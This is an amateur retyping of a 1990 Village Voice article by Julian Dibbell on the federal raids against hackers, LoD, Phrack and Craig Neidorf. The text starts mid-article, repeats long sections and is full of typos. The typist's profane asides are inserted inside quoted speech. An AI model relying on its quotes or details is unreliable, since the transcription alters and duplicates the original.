    And if the Morris jury's decision wasn't a mandate to stamp out hacking once and for all, the fed's certainly seemed to treat it as one. The Queen sweeps, it turned out, were just the begining. ALl winter and pring raids came down, raids that had been brewing for a year and a half and that eventually mobilized hundred of Secret service agents, police officers, and federal and state prosecutors in 15 states. It was a crackdown heavier than any the underground had seen before. Call it the Raids of 1990. The hackers and their advocates have called it other things: a witch hunt, a dangerous misunderstanding of the subculture, business as usual, and the end of an era. 
    Whatever it was, as the spectacle playes itself out it became clear that its implications reached beyond the computer underground. For decades now, people have been talking about the coming of the Information Age, specualting about it, dipping their toes in it. But hackers are living in it. Like kids just moved into a half-finished housing tract, they're exploring it's contours, spray painting their tags on the walls. And as they run into ever toughining resistance, they are among the first to get the short end of the inevitable struggle between info-haves and info-have nots. The politics of the informations age are still a question mark. As the paradigms shift, power is measured less and less in megatons and more and more in megabytes- hut how, and to whom, will it be measured out? The asnwers are still up for grabs, and all spring and winter long the raids of 1990 have been trying to snatch them out from under our noses."

"'It's nice to be a little paranoid,' says Corrupt, smiling down into his french fries, cozy upstairs at the West 3rd St. McDonalds. 'Makes you feel wanted'.
    The Seeker nodes his head in agreement. The others-- Phiber Optik, Acid Phreak, the Potent Rodent, Bandito-- don't really pay much attention. Among hackers, there's not much debating the merits of a healthy dose of paranoia: it's a given. Phiber Optik just digs deeper into his Big Mac. Bandito, the Potent Rodent, and Acid play with a fantasy: maybe they'll get a hold of a camcorder and produce their own TV show, a public access hackerhow to or something.
    They're thinking small, though. Seated around this table is a cast of characters Fox would kill to get in its fall lineup: MoD, they call themselves (Masters of Deception, Masters of Disaster, Mom's on Drugs-- depends what day of the week you ask), a handful of New York's best hacker, united in the quest for knowledge and fucking around. They're young, they're bad, and short of a girl or two they're telegenically diverse: Corrupt aka the Hip Hop Hacker, sports funki dreds and wrote the book on sneaking in to Vax mainframes; the Seeker cuts and after school special hero profile and cooks up electronic gadgetry, for instance, to scam free calls out of pay phones; the Potent Rodent is a pleasent looking poindexter type with a taste for Unix systems; Bandito, one of the two Latino's in the group is a generalist. And the Acid Phreak and Phiber Iptik -- relatively big names in the underground (and it's sole representatives in the Harper's March hacker roundtable), veterans of years of intense spelunking through the phone systems and it's computers, slightly more stylish than the others (Acid working a casual Latin hiphouse look, Phiber Optik in his wool overcoat and wir-rim glasses)--well let's pretend they're stars.
    Selling this show to the sponsors, of course, might take some doing. Six years after War Games fixed it's attractive, impish hacker-hero in the popular mind, the hacker's image has gotten ugly. Laws aimed specifically at computer trespass have passed in Congress and every state except vermont; media spin control has increasingly fallen to the institutions hackers bedevil and the government agencies empowered to arrest them. the feds claim we are admist an electronic crime-wave-- rooted in a dangerous subculture of instant communications-- that threatens commerce, research, and national security. 
    "Our experience shows that many computer hacker suspects are no longer misguided teenagers mischieviously playing games on their computers in their bedrooms," says Gary Jenkins, assnt. director of the US Secret service. "Some are now high tech computer operators using computer to engage in unlawful misconduct (sounds like a fucking SS politician, sheesh!!!)
    There's not much real evidnce of Jenkins new breed of hacker, however. Long distance carriers report alarming increases in abuse of cracked calling card codes (the telecom equivalent of turnstile jumping) (gawd!!!!), but there've still been no top secrets pirated out of government computers, still no serious disruptions of research (unless you count the Morris fiasco, which caused no loss of data). The number of hackers out there may have grown (though it's not entirely clear that it has), but not their maleciousness or their power. What has changed is the historical context. War Games, after all, was the cold war's perversion of technology. You remember the cold war, don't you? Plenty of people do, many of them fondly enough to make the construction of Evil Empire sustitutes a cottage industry. And no cadidate is quite so poetic as the hacker-- a shiny new enemy lurking deep in the very haze of informatics that's replacing the oldbattle field lines. It's this longing, ultimately, that drives the rhetorical transformation of mischievious "misguided teenagers" into menacing "high tech computer operators." The same nostalgia underlies the success of astrnomer-turned-computer-security-expert Clifford Stoll's nonfiction bestseller The Cuckoo's Egg, released late last year. The gripping (and virulenty antihacker) tale of Stoll's pursuit of a West German hacker through the bewildering web of military and academic computer networks that now blankets the world, it ends in a comforting old fasioned revelation: the intruder was in the pay ofthe KGB all along. 
    In the long run, though, hackers may have a tough time competing with drug lords and Japanese conglomerates for the attentions of this historically paranoid nation. The disappointing truth is thatthe majority of hacker's-- and especially the upper echelon trageted by raids of '90-- are in it neither to pilfer nor to terrorize. Even the dread Robert Morris never meant to tie up any of Internet's 180,000 computers. He desighned his worm to insert itself into as many of them as it could gain access to, nothing more. His was the ultimate cyborg dream: to saturate the largest netqork in thw world with peices ofhis own code. He didn't associate with the underground, but the activites it prizes most-- penetrating systems, exploring their internal workings, staying inside unnoticed-- are simply variations on Morris's attempted coupling with the infosphere. Hacker's aren't so much enemies of the new order as they are absurdly passionate lovers.
    Which is what makes htem ultimately undependable as bogeymen. That, and their annoying habit of turning out to be just mischievous teenagers anyway. They hang out at Mc Donald's for god's sake. They think having a public access TV show would be neat. They think MoD's World would be a perfect title, and at the very thought they break out into air renditions of the Wayne's World theme. And if they're a lot more scared of the US government than Bart Simpson is of homer, they're having to much fun to show it.


Two weeks after the raids in Queens, the feds struck three homes near Atlanta: Secret Service agents swooped down with guns drawn, crowbars
at doors, arrest warrants in hand. this time there was an indictment: a grand jury had charged Robert J. Riggs (aka the Prophet), Franklin E. Darden Jr. (aka the Leftist), and Adam E. Grant (aka the Urvile or Necron 99) with crimes punishable by up to 40 years and $2 million, including taking over Bell SOuth switching computers, bilking wired cash out of Western Union, and conspiring to transport stolen electronic goods.
    And this time, as the indictment pointedly noted, all three suspects were members of LoD.
    To the US Attorney in Atlanta, LoD was a "closely knit group of approximately 15 hackers" spread throughout the country and engaged in disrupting the phone system, invading credit-bureau computers, stealing proprietary software, trading stolen passwords, and generally promoting the pread of computer crime. To hackers, however, LoD was, and is, a peice of history.
    It's roots lie in the summer of 1984, when "a huge surge of intrest in computer telecommunications placed an incredibly large number of new inthusiast on the national scene-- or so claims a smei-official chronical/mythos of LoD that hitboards last month. "This crowd of people began to put a strain on the national BBS scene, as the novices stormed phonelines in search of knowledge. From out of this chaos came a need for learned instructors to help passthe informations to the new throngs."
    Among those who responded to the call was an experienced hacker known as lex Luther. Gathering eight of his peers from around the country, Lex set up home base on an invite only Long Island board and named his group after the band of villains who joined forces against superman in the cartoon series Superfriends. In the years that followed, LoD produced a number of educational text files that circulated widely on h/p boards, but the organization was never much about coordinated effort. Its most important function in the reputation driven and neccesarily susicious culture of hack/phreakdom seems instead tohave been conferring on its members a badge of honor and fostering mutual trust. In this it was like a lot of other groups that had come and gone over the years. But in another way it was auite different: LoD lasted.
    It lasted through six years of almost constant turnover due to busts, bug-outsm loss of intrest, college; long enough to become a monument to the computer underground's vigor and focus of the electronic security establishment's rage and paranoia. And if the feds wanted to throw a gut punch to the subculture, they could hardly have picked a better target.
    Unless maybe it was Phrack. An electronic newsletter that floated through the nets and around BBS's several times a year, Phrack was jam-packed with technical instruction files, interviews with underground "celebrities", and updates on the latest busts and on-goings. There have been several other digital 'zines like it, but at 5 years old, Phrack was the h/p worlds longest-running, most dependable electronic publication-- like LoD, it was a pillar of stability in a community defined by transience.
    And 8 days after the Atlanta busts, the secret service arrested one of Phrack's two co-editors, a 19 year old U of Missouri student named Craig Needorf. The indictment against him, signed by the US Attorney in CHicago, named the Atlanta hacker Riggs as a coconspirator in what was presented as a seeply disturbing criminal scheme. In 12/88, the feds claimed Riggs illegally accessed Bell South mainfrmaes and downloaded to his own computer a copy of the "highly proprietary and closely help computer program that controlled and maintained the E911 system"--he had, in other words, taken in his hands the lives and saftey of the millions of people who depended on Bell SOuth's E911 network. Worse than that, though, he proceeded tto transfer this potentially terrorist bundle of data--- valued by the phone company at $79,449-- to a public BBS in Lockport, Ill. From there Neidorf, whose role in the underground was that of a journalist rather than a hacker, downloaded, edited, and disseminated the data via Phrack, spreading he poisonous code throughout the underground. 
    This was scary. Wasn't it?
    Well actually the "highly proprietary and closely held" data in question was in fact not a program but a text file, and a pretty dull one at that. Lyrically titled the "Bell South Standard Practice 660-255-104SV Control Office of Administration of Enhanced 911 Services for Special and Major Account Centers", the file had been included in the February 1989 Phrack and was widely available on BBS's. Readers were treated to a breif 20k (anout 6 pages) of bureaucratese detailing the obligations and procedures of all parties involved in the maintainence and operazation of the computerized E911 system. The file itself no more controlled the system than the organizational chart at the White House controls the nation. At worst, it could be used to aid a social engineering (hacker term for conning info out of coporate types), which might, way down the line, result in a breach of 911's security. At most, it's value to Neidorf was roughly that of underwear stolen in a panty raid.
    But it cost him plenty. Neidorf lost his PC, he lost his access to the universities computers (through which he had legitamitaly distributed the newsletter over Internet and other networks), and he faced a maximum penalties of 31 years in prison and a $122,000 fine. The 'zines founder and coeditor, a childhood friend of Neidorf known as Taran king. hasn't spoken to him since the arrest. For all intents and purposes, Phrack was over. And to anyone at all sensitive to the changing nature of the press in a computerized society, that was the scary part of the case: under suspicion of disseminating stolen info, a publications was effectivaly silenced. If the New York Times had lost its printing presses under similiar circumstances, there would have been media hell to pay. In fact, the Time had faced a similiar circumstance nearly 2 decades befor, when it defied federal legal pressure by publishing stolen documents Daniel Ellsberg had stolen from the Pentagoon. The Times stood on their First Admendments rights and won that round hands down.
    Phrack, however, was not the New york Times. It was just two modem-equipped college kids, one of whom stood only a slim chance of winning his criminal case with the 1ST admendment arguements. Opting wisely for the better part of valor, Neidorf's lawyer, Sheldon Zenner, spent pretiral months hammering away at inconsistensies and irrelevanceis in the terms of the indictment. Finally, on 6/11, the prsecution handed down a drastically revised indictment. Zenner's efforts had paid off.
    Sort of. The good news was that a number of counts based on the COmputer Fraud and Abuse Act had been dropped. The bad news was that through creative interpretation of federal wire fraud sttues the prosecution had frightingly expanded Neidorf's alleged role in the conspiracy. No longer was he charged merely with recieving  and transporting the "stolen" E911 document (newly devalued to $23,900, perhaps in competition with an ad-parody in 2600 offereing the file at an unbelievable low price of $59,499)-- now Phrack itself had become part of a larger scheme to "solicit information about hor to illegally access computers and telecommunications systems from computer hackers." In support of this charge, the indictment named five Phrack articles published in 1988. None of the five newly introduced articles was stolen property, most were of a general technical nature, and one was simply news, announcing an upcoiming phreak.hacker convention and even inviting law inforcement officials and security professionals to attend. 
    Nothing in these article was any more dangerous than what you might expect to get out of The Cuckoo's Egg, except maybe the impression that hacking was nothing to be ashamed of. Zenner had no choice now but to take the first. Fourtunately, by now Neidorf had picked up some impressive alies. Late in May, Rabinowitz, Boudin, the venrable constitutional law firm that defended Daniel Ellsberg in the Pentagon Papers trial, began offering assistance to Neidorf and other victims of the raids. Much of their tab, apprantly, would be picked up by a lobbying group called the Electronic Frontier Foundation then being setup by multimillionaire Mitch Kapor-- the creators of Lotus 123 spreadsheet. Neidorf's trial was finally shaping up into the 1st admendment test case it was meant to be all along.
    But civil libeterians who saw only constitutional principles at stake in the Raids ignored the real bone of contention for both feds and hackers: the right to life of a subculture dedicated to reckless exploration of the electronic frontier. It was a right hotly asserted in the remaining hackersymp publications (2600, CUD) and in the lone screens of posted BBS's around the country. Five days after Neidorf's arrest, in fact, a Univ. of texas student uploaded into the networks a fervent apologia for the computer underground.
    "My name is Chris," It began, "but to the computer world, I am Erik Bloodaxe. I have been a member of the group known as LoD since it's creation, and admittedly I have not been the most legitamite user around, but when people start hinting at my supposed Communist-backed actions, and say that I am involved in a wolrd-wide conspiracy to destory the nations computer and/or 911 network, I have to speak up and hope that people will take what I have to say seriously..."
    He went on to place Rigg's "theft" of thge Bell SOuth file in subculture prespective: "This is usually standard procedure: you get on a system, look around for interesting text, buffer it, and maybe print it out for posterity. No member of LoD has ever (to my knowledge) broken into another system and used any info gained from it for personal gain of any kind... with the exception of maybe a bog boost to his reputation around the underground...
    "People just can't seem to grasp the fact that  a group of 20 year old kids just might know a littlemore than they do," he concluded, "and rather than make good use of us, they would rather just lock us away and keep on letting things pass by them... You can't stop burglars from robbing you when you leave the doors unlocked and merely bash them in the head with a baseball bat when they walk in. You need to lock the door... When you leave the doors open, but lock up the people who can close them for you, another burglar will just walk right in."


In the early morning of March 1, 1990, Erik Bloodaxe awoke in his Austin home with a cocked pistol held to his head and a Secret Service agent telling him to get out of bed.
    Across town, his friend Loyd-- the Mentor, a 26 year old LoD member who had retired from active hacking a year earlier but had continued to run a h/p bbs out of his house-- was getting the similiar treatment. Erik Bloodaxe had been expecting this for a while, so feds weren't able to cart of much in the way of hardware from his place: a big bag of TV cable wire, some phone parts, some LoD stationary, a full sized Pac Man game. The mentor lost several thousands of dollars worth of computer equipment. No arrest were made, no charges specified. But the feds made it quite clear what the raids were all about.
    They weren't so generous to the Mentor's boss, board game publisher Steve Jackson. ALl he knew was that when he and his employeed showed up that morning they found the enterance barred. Inside, police and secret service agents were busy tagging and bagging: they took computers, a laser printer, and a dick containing every copy of the rules to a new role playing game the company was preparing to ship within a few days. The game was a futuristic adventure called GURPS Cyberpunk, and the Mentor was it's author. When Jackson went down to the secret service offices the next day to get an explanation, they offered only the absurd accusation that the game he had been banking on to get him through the year's first quarter was a "handbook form computer crime".
    The secret service help on to Jackson's property for almost 4 months. During that time loss of sales revenue compounded Jackson's original losses of equipment replacement and data recovery. By the time he patched together a marketable version of the rule book form earlier drafts, his estimate of the raid's dmagae had reached $125,000. Since March, his company's been on the the brink of bankruptcy. The secret service played fast and loose not only with Jackson's freedom of speech, but with his freedom from unreasonable search and seizure as well, and it's hard to see what hard evidence they might have got out of the raids on his offices. But all in all they must have been rather pleased with themselves that day, because the bottom line in the austin busts was this: the feds had scored big. With half it's members now under indictment or threat of indictment, and the other half lying very low, LoD was as close to dead as it had ever been.


So it was something of an anticlimax when on May 9 prosecutors and secret cervice ops in Phoenix, Arizona announced the culmination of the raids of 1990: Operation Sun Devil, a 3 day sweep starting on Monday may 7, in which over 150 secret service agents, working with state and local police, executed 28 search warrents, most of them sealed, in 14 cities across the country, netting 42 computer and about 23,000 disks.
    As infotainment, the may mobilization barely competed with the sentencing of Robert Morris Jr. three days prior (he got of relatively light: $10,000 and 400 hours community service). Federal mouthpeices at the Phoenix press conference spoke dramatically about Operation Sun Devil's aversion of "impending dangers" to the public, but the truth was that these latest busts weren't all that juicy-- for the most part they took out computer youthj suspected of long-distance phone code abuse and credit-card fraud. Try as the feds might, it's hard to get the general public to feel for the quasi-monopolies victimized by these activities. And through 2600 billed this new attack as" the largest hacker raid in history", there was somefeeling in the computer underground that it's targets hardley deserved the name-- in the h/p universe, "k)dez kidz" (who spend most of there time cracking and abusing calling card numbers) ride low on the totem pole of respect, just ahead above the despised "warez d00dz" (who spend most of their time trading pirated software); "carding" seems to derive it's slightly higher consideration only from the fact that it's riskier.
    Which doesn't mean this blow didn't hurt. For one thing, codes kids and carders weren't the only people caught. SOme sophisticated hackers went down too-- like MoD's Crazy Ediie, arrested by state police on Long Island for hacking into a Mass. business's Unix. And several of the raidees ran boards, the heart of what ever community exists in the computer underground-- in CHicago, the legendary Ripco board was hit, and locally the 15 year old operator of one of New York City's last h/p boards watched with his mother as shotgun wielding secret service agents carried his amiga away. Perhaps most signifigant, though, inthe long run, was the damage done to the computer undergrounds ecology: looked down on or not, codes kids and wares doods have always formed a pool of potential full-leged phreaks and hackers. By clmaping down on code abuse, Op. Sun Devil was putting the screws onthe underground for years to come.
    So mayber Sun Devil was a coup de grace. And maybe it was just a mop-up action. Either way, the feds had shot thier load. There was nothing left to do now but stand back and assess the damage.


Standing in Wawshington Square Park on a brisk March Sunday, Bandito, age 16, shared with the other members of MoD a dream he had when he was just beginning to phreak:
    "I was going up in this elevator to see my friend, and like this woman started coming on to me, right? I say, oh wow right? Then like we went into her apartment, and like she put her briefcase down, and it was like NY Telephone, right? And i was like, Hey, if you want me to goto bed with you, you have to give me everything, right> And all the printouts started coming out, and on the printouts was like every sisngle Unix, all the Bell Unixes, and everything was echoed, it like all showed up, it wasn;t like the password wasn't there. You even saw like the modem commands and like the phone number of the system. i was like, Cool! She's like c'mon.... I was like No,no,no, I gotta photocopy this..."
    Which gives you some idea of what the feds are up against. If even the adlescent sex drives can't overcome the urge to hack, what makes a bunch of suited-up cartoon dads think they can?
    Their guns maybe. Thier money, thier courts, their prosecutors. there's no doubt about what these tools can do to individual offenders. Right now dozens of hacker's across the country await trial or indictment, some of them no doubt swearing off computers for life. Down in Atlanta, the Prophet, the Leftist, and the Urbile, have all pleaded quilty. And next wekk, starting on July 23, Craig Neidorf's case goes to trial in chicago. if he loses, he looks at 65 years in jail and over a million dollars in fines. If he wins, so does freedom of the press, but that may be a small consolation to him: his hardl;y well-to-do family's legal fee's have already topped $60,000. People in contact with him say his college funds are now completely exhausted.
    But what effect underground as a whole is hard to guage. Some hackers, pointing to the drastically reduced number of h/p boards and the increasing stigmatization of hacking, have argued that the Raids of '90 represent a crisis the subculture may not survive. A few weeks ago a caller identified as Scum of the Earth left this note on an underground board somewhere in the 718 arae. bemoaning the prospects for a transfusion of young blood from today's computer-literate pubescents: "Kids today couldn't give a rats-ass about hacking, they are too busy playing fucking Nintendo and watching TMNT all day long. Yes, there are more home computers today then there were back then, so you may think that there will be more hackers coming onto the scene. Wrong, computer today are part of everyday life, they aren't as fascinating to kids now as they were back in the early 80's... all these bust in the media, a lot of people are scared... So, if this generation dies out (ie: get's busted, stagnates, retires), I don't think hacking has much of a future."
    But there's ample evidence that the present generation is already creeping back to full strength. A new, bootleg Phrack has popped up-- of unknown authorship and dubios quality, but the thought counts. And in the latest 2600, 2 unraided LoD members-- Phantom Phreaker and Doom Prophet-- have dared to fly their colors with an article on telco anti-phreak devices. 2600's open monthly meetings too, show no signs of deterioration. Held in a mini-mall in the bowles of Manhattan's Citicorp building, they remain lively, crowded hangouts they've always been.
    At this month's meeting you could've met Scum of the Earth, a long haired 20 something in a tie-dyed t-shirt who is, like most hackers, a much nicer person than you'd guess from posts on boards. Acid Phreak was there too, and Phiber Optik, and most of the rest of MoD. The phreaks from Queens haven't been indicted, though they haven't seen their computers since the day they were confiscated. Acid insiss that they've been keeping their noses clean. Other people present the meeting, however, hinted at new m.o.'s developing inthe clampdown climate. One longtime undergrounder, a raids casualty, confessed in a stage whisper to doing some interesting things frompayphones, using a portable computer. "He's hooked," said the Seeker, smiling in amazement. "He won't quit till he goes to jail." The seeker himself is calling it quits for a while. "Wierd and arcane noises" on his line have him convinced it's tapped. Corrupt, too, is keeping a low profile till things blow over. MoD's younger members, however, show no such restraint. In Scum of the Earth's analysis, they should be frying their minds with Nintendo, but the hacking bug has bitten them good. Ask the Potent Rodent, who gives his age between 13 and 16, why he continues such risky activities as exploring phone switched and setting up parasite boards on hacked unixes and he'll shrug: "I don't know. I just have to."
    In the end the, though, the greatest sourceof optimism for hackers is history. they've been through this before. Waves of busts ar endemic, and though they've always been smaller than this year's, they've often been as scary. In 1987 one such wave slowed the computer underground to near-hatl-- Phrack went on hiatus, LoD was on ice. But within a year the scene was up and running again, and in Phrack's combeback issue an undergrounder known as Knight Lightning launched a cocky minimanifesto: 
    "Knowledge is the key to the future and it is FREE. The telecommunications and security industries can no longer withhold the right tolearn, the right to explore, or the right to have knowledge. The new age is here and with the use of every *LEGAL* means available, the youth of today will be able to teach the youth of tomorrow."
    A smirk underlined the word legal of cource, but the earnestness of the lines was otherwise pure. It's possible Knight Lightning still fails to see any irony in them, or in  their implication that the future of political struggle rests on a community of kids who wet-dream about forbidden data, whostand with one foot on cyberspace and the other in Wayne's World. But that's understandable. If the governments war on hackers has done nothing else, it has given their teen rebel posturing a wieght it should never have to bear. Knight Lightning should know: his real name is Craig Neidorf, and the article in which he wrote those words is count two of his indictment.
    He could get five years for it.

**********************************************************************
 Yep, another article form the elite journalist of hackerdom Julian Dibble, this one's on just general bullshit. I copied it from the Village Voice 7/24/90. MoD is on the cover looking good. This is fucking long article and represents about five hours of typing and a 12 case of Diet Coke over the midnight hours. Enjoy it dammit.
                                                            --TiN OmeN
**********************************************************************


"On Line and Out of Bounds..." By Julian Dibbell



Here's how Joey tells the story: 

It was around 3:30 on a Wednesday afternoon in January when the knock on the door came. The house was a three-family place in Queens, not far from the Brooklyn borough line. Joey's 12-year-old sister, the only person home at the time, answered the door. She'd never seen a search warrent before. She didn't understand why eight casually dresses and fully armed strangers barged into her house, headed straight for her brother's room, and began putting his things- starting with his computer, a stripped-down Commy 128- in boxes. She decided that they were theives, and that the only thing to do was cry.
When Joey's mother arrived home a short while later from her job as a midtown receptionist, her daughter met her at the back dfoor and told her that a bunch of men from the"Social Services Department" were inside stealing things. "The social what?" asked Joey's mom.          
    "U.S. Secret Service," said the men in Joey's room. US Secret Service. and a couple of security guys from the telco. They told her that they wanted to talk to her 20 year old son. They had reason the belive that Joey was a phone-systems hacker- a phone phreak- known in the computer underground as Acid Phreak. They had reason to believe he was a leader of the notorious hacker organization known as the LoD. They also suspected he was responsible for the multi-million dollar AT&T system crash on 1/15, which disrupted long-distance service for 9 hours. Joey's mom was not thrilled. 
    Joey got home from the movies about half an hour later. An agent carrying a box of his personal effects met him in the driveway, told him he'd better go inside and calm his mother down. He did. Then the rest of the agents greeted him with a wlcome home chorus of "JOEY!!!" By now they had almost finished packing up anything that looked interesting: his computer, three notebooks, about 200 floppy disk, his answering machine, his boombox, all of his cassette tapes. 
    Joey wasn't under arrest, but when they asked him to take a ride to the headquarters at the World Trade Center, he agreed. Once there, he says, they asked him what phone-system computers he had gained access to. He told them, in effect, that there weren't many he Hadn't penetrated, and he did his best to explain to the phone company reps the flaws in their security. They asked him about other hackers, asked him to name names. He didn't. They asked him what the purpose of his answering machine was. He told them it answered the phone. They asked him if he had mob connections, and they asked him if he was a Communist. They told him it was in his best intrest to cooperate. 
    Around one in the morning they let him go, no charges filed. By then he had sighned an statement swearing he hadn't caused the AT&T disaster (the phone comapny maintained that it was a result of a bug in their own software), and to this day he swears that in 10 years of hacking mainframe compuetrs and messing with the phone lines he never, to his knowledge, damaged a system. He'll also tell you that although his notebooks contained some juicy tech lore and the phone numbers of quite a few hackers, the floppies contained only about five disk of hacking info, with the remaining 195 or so taken up by games, and that the incriminating evidence on his audio tapes fell into roughly four categories: salsa, merengue, house, and lambada. 
    He'll also tell you, as will just about any local hacker or phone phreak you ask, that he was not the only Queens based telecom enthusiast radied on 1/24/90. The secret service also visited the homes of Joey/Acid Phreak's friend Mark (better known on BBS's as Phiber Optik, and as it turned out the onlt actual memebr of LoD raided that day) and a third "co-conspirator" known as Scorpion. Again no charges, and no big deal. Hacker busts go on all the time; there didn't seem to be any reason for these three searches to make waves outside the ad hoc network boards, electronically transmitted 'zines, and telephone conversations that constitutes the computer underground.     But there was something ominous about those raids. Only two days before, a guilty verdict had come down in the most publicized trial in the history of computer crime: accused of infecting the vast InterNet research network with a worm program that went haywire and temporarily shut down as many as 6000 systems, 24 year old Cornell grad student Robert Morris Jr became the first person ever convicted under the COmputer Fruad and Abuse Act of 1986 and now faced up to five years in prison and a $250,000 fine.
    And if the Morris jury's decision wasn't a mandate to stamp out hacking once and for all, the fed's certainly seemed to treat it as one. The Queen sweeps, it turned out, were just the begining. ALl winter and pring raids came down, raids that had been brewing for a year and a half and that eventually mobilized hundred of Secret service agents, police officers, and federal and state prosecutors in 15 states. It was a crackdown heavier than any the underground had seen before. Call it the Raids of 1990. The hackers and their advocates have called it other things: a witch hunt, a dangerous misunderstanding of the subculture, business as usual, and the end of an era. 
    Whatever it was, as the spectacle playes itself out it became clear that its implications reached beyond the computer underground. For decades now, people have been talking about the coming of the Information Age, specualting about it, dipping their toes in it. But hackers are living in it. Like kids just moved into a half-finished housing tract, they're exploring it's contours, spray painting their tags on the walls. And as they run into ever toughining resistance, they are among the first to get the short end of the inevitable struggle between info-haves and info-have nots. The politics of the informations age are still a question mark. As the paradigms shift, power is measured less and less in megatons and more and more in megabytes- hut how, and to whom, will it be measured out? The asnwers are still up for grabs, and all spring and winter long the raids of 1990 have been trying to snatch them out from under our noses."

"'It's nice to be a little paranoid,' says Corrupt, smiling down into his french fries, cozy upstairs at the West 3rd St. McDonalds. 'Makes you feel wanted'.
    The Seeker nodes his head in agreement. The others-- Phiber Optik, Acid Phreak, the Potent Rodent, Bandito-- don't really pay much attention. Among hackers, there's not much debating the merits of a healthy dose of paranoia: it's a given. Phiber Optik just digs deeper into his Big Mac. Bandito, the Potent Rodent, and Acid play with a fantasy: maybe they'll get a hold of a camcorder and produce their own TV show, a public access hackerhow to or something.
    They're thinking small, though. Seated around this table is a cast of characters Fox would kill to get in its fall lineup: MoD, they call themselves (Masters of Deception, Masters of Disaster, Mom's on Drugs-- depends what day of the week you ask), a handful of New York's best hacker, united in the quest for knowledge and fucking around. They're young, they're bad, and short of a girl or two they're telegenically diverse: Corrupt aka the Hip Hop Hacker, sports funki dreds and wrote the book on sneaking in to Vax mainframes; the Seeker cuts and after school special hero profile and cooks up electronic gadgetry, for instance, to scam free calls out of pay phones; the Potent Rodent is a pleasent looking poindexter type with a taste for Unix systems; Bandito, one of the two Latino's in the group is a generalist. And the Acid Phreak and Phiber Iptik -- relatively big names in the underground (and it's sole representatives in the Harper's March hacker roundtable), veterans of years of intense spelunking through the phone systems and it's computers, slightly more stylish than the others (Acid working a casual Latin hiphouse look, Phiber Optik in his wool overcoat and wir-rim glasses)--well let's pretend they're stars.
    Selling this show to the sponsors, of course, might take some doing. Six years after War Games fixed it's attractive, impish hacker-hero in the popular mind, the hacker's image has gotten ugly. Laws aimed specifically at computer trespass have passed in Congress and every state except vermont; media spin control has increasingly fallen to the institutions hackers bedevil and the government agencies empowered to arrest them. the feds claim we are admist an electronic crime-wave-- rooted in a dangerous subculture of instant communications-- that threatens commerce, research, and national security. 
    "Our experience shows that many computer hacker suspects are no longer misguided teenagers mischieviously playing games on their computers in their bedrooms," says Gary Jenkins, assnt. director of the US Secret service. "Some are now high tech computer operators using computer to engage in unlawful misconduct (sounds like a fucking SS politician, sheesh!!!)
    There's not much real evidnce of Jenkins new breed of hacker, however. Long distance carriers report alarming increases in abuse of cracked calling card codes (the telecom equivalent of turnstile jumping) (gawd!!!!), but there've still been no top secrets pirated out of government computers, still no serious disruptions of research (unless you count the Morris fiasco, which caused no loss of data). The number of hackers out there may have grown (though it's not entirely clear that it has), but not their maleciousness or their power. What has changed is the historical context. War Games, after all, was the cold war's perversion of technology. You remember the cold war, don't you? Plenty of people do, many of them fondly enough to make the construction of Evil Empire sustitutes a cottage industry. And no cadidate is quite so poetic as the hacker-- a shiny new enemy lurking deep in the very haze of informatics that's replacing the oldbattle field lines. It's this longing, ultimately, that drives the rhetorical transformation of mischievious "misguided teenagers" into menacing "high tech computer operators." The same nostalgia underlies the success of astrnomer-turned-computer-security-expert Clifford Stoll's nonfiction bestseller The Cuckoo's Egg, released late last year. The gripping (and virulenty antihacker) tale of Stoll's pursuit of a West German hacker through the bewildering web of military and academic computer networks that now blankets the world, it ends in a comforting old fasioned revelation: the intruder was in the pay ofthe KGB all along. 
    In the long run, though, hackers may have a tough time competing with drug lords and Japanese conglomerates for the attentions of this historically paranoid nation. The disappointing truth is thatthe majority of hacker's-- and especially the upper echelon trageted by raids of '90-- are in it neither to pilfer nor to terrorize. Even the dread Robert Morris never meant to tie up any of Internet's 180,000 computers. He desighned his worm to insert itself into as many of them as it could gain access to, nothing more. His was the ultimate cyborg dream: to saturate the largest netqork in thw world with peices ofhis own code. He didn't associate with the underground, but the activites it prizes most-- penetrating systems, exploring their internal workings, staying inside unnoticed-- are simply variations on Morris's attempted coupling with the infosphere. Hacker's aren't so much enemies of the new order as they are absurdly passionate lovers.
    Which is what makes htem ultimately undependable as bogeymen. That, and their annoying habit of turning out to be just mischievous teenagers anyway. They hang out at Mc Donald's for god's sake. They think having a public access TV show would be neat. They think MoD's World would be a perfect title, and at the very thought they break out into air renditions of the Wayne's World theme. And if they're a lot more scared of the US government than Bart Simpson is of homer, they're having to much fun to show it.


Two weeks after the raids in Queens, the feds struck three homes near Atlanta: Secret Service agents swooped down with guns drawn, crowbars
at doors, arrest warrants in hand. this time there was an indictment: a grand jury had charged Robert J. Riggs (aka the Prophet), Franklin E. Darden Jr. (aka the Leftist), and Adam E. Grant (aka the Urvile or Necron 99) with crimes punishable by up to 40 years and $2 million, including taking over Bell SOuth switching computers, bilking wired cash out of Western Union, and conspiring to transport stolen electronic goods.
    And this time, as the indictment pointedly noted, all three suspects were members of LoD.
    To the US Attorney in Atlanta, LoD was a "closely knit group of approximately 15 hackers" spread throughout the country and engaged in disrupting the phone system, invading credit-bureau computers, stealing proprietary software, trading stolen passwords, and generally promoting the pread of computer crime. To hackers, however, LoD was, and is, a peice of history.
    It's roots lie in the summer of 1984, when "a huge surge of intrest in computer telecommunications placed an incredibly large number of new inthusiast on the national scene-- or so claims a smei-official chronical/mythos of LoD that hitboards last month. "This crowd of people began to put a strain on the national BBS scene, as the novices stormed phonelines in search of knowledge. From out of this chaos came a need for learned instructors to help passthe informations to the new throngs."
    Among those who responded to the call was an experienced hacker known as lex Luther. Gathering eight of his peers from around the country, Lex set up home base on an invite only Long Island board and named his group after the band of villains who joined forces against superman in the cartoon series Superfriends. In the years that followed, LoD produced a number of educational text files that circulated widely on h/p boards, but the organization was never much about coordinated effort. Its most important function in the reputation driven and neccesarily susicious culture of hack/phreakdom seems instead tohave been conferring on its members a badge of honor and fostering mutual trust. In this it was like a lot of other groups that had come and gone over the years. But in another way it was auite different: LoD lasted.
    It lasted through six years of almost constant turnover due to busts, bug-outsm loss of intrest, college; long enough to become a monument to the computer underground's vigor and focus of the electronic security establishment's rage and paranoia. And if the feds wanted to throw a gut punch to the subculture, they could hardly have picked a better target.
    Unless maybe it was Phrack. An electronic newsletter that floated through the nets and around BBS's several times a year, Phrack was jam-packed with technical instruction files, interviews with underground "celebrities", and updates on the latest busts and on-goings. There have been several other digital 'zines like it, but at 5 years old, Phrack was the h/p worlds longest-running, most dependable electronic publication-- like LoD, it was a pillar of stability in a community defined by transience.
